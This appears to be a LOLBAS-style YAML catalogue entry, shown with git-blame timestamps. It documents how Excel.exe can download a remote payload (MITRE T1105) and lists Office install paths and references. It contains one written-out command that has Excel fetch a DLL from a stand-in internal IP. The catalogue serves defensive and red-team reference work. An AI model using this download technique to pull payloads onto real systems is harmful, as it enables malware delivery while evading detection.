2019-09-17 22:44:27 +02:00
|
|
|
---
|
|
|
|
Name: Excel.exe
|
2019-09-17 22:58:03 +02:00
|
|
|
Description: Microsoft Office binary
|
2019-09-17 22:44:27 +02:00
|
|
|
Author: 'Reegun J (OCBC Bank)'
|
|
|
|
Created: '2019-07-19'
|
|
|
|
Commands:
|
2019-09-17 22:58:03 +02:00
|
|
|
- Command: Excel.exe http://192.168.1.10/TeamsAddinLoader.dll
|
2019-09-17 22:44:27 +02:00
|
|
|
Description: Downloads payload from remote server
|
|
|
|
Usecase: It will download a remote payload and place it in the cache folder
|
|
|
|
Category: Download
|
|
|
|
Privileges: User
|
|
|
|
MitreID: T1105
|
|
|
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
|
|
|
OperatingSystem: Windows
|
|
|
|
Full_Path:
|
|
|
|
- Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Excel.exe
|
|
|
|
- Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Excel.exe
|
|
|
|
- Path: C:\Program Files (x86)\Microsoft Office\Office16\Excel.exe
|
|
|
|
- Path: C:\Program Files\Microsoft Office\Office16\Excel.exe
|
|
|
|
- Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\Excel.exe
|
|
|
|
- Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\Excel.exe
|
|
|
|
- Path: C:\Program Files (x86)\Microsoft Office\Office15\Excel.exe
|
|
|
|
- Path: C:\Program Files\Microsoft Office\Office15\Excel.exe
|
|
|
|
- Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\Excel.exe
|
|
|
|
- Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\Excel.exe
|
|
|
|
- Path: C:\Program Files (x86)\Microsoft Office\Office14\Excel.exe
|
|
|
|
- Path: C:\Program Files\Microsoft Office\Office14\Excel.exe
|
|
|
|
- Path: C:\Program Files (x86)\Microsoft Office\Office12\Excel.exe
|
|
|
|
- Path: C:\Program Files\Microsoft Office\Office12\Excel.exe
|
|
|
|
- Path: C:\Program Files\Microsoft Office\Office12\Excel.exe
|
2019-09-17 22:58:03 +02:00
|
|
|
Code_Sample:
|
|
|
|
- Code:
|
|
|
|
Detection:
|
|
|
|
- IOC:
|
2019-09-17 22:44:27 +02:00
|
|
|
Resources:
|
|
|
|
- Link: https://twitter.com/reegun21/status/1150032506504151040
|
|
|
|
- Link: https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191
|
|
|
|
Acknowledgement:
|
2019-09-17 22:58:03 +02:00
|
|
|
- Person: 'Reegun J (OCBC Bank)'
|
2019-09-17 22:44:27 +02:00
|
|
|
Handle: '@reegun21'
|
|
|
|
---
|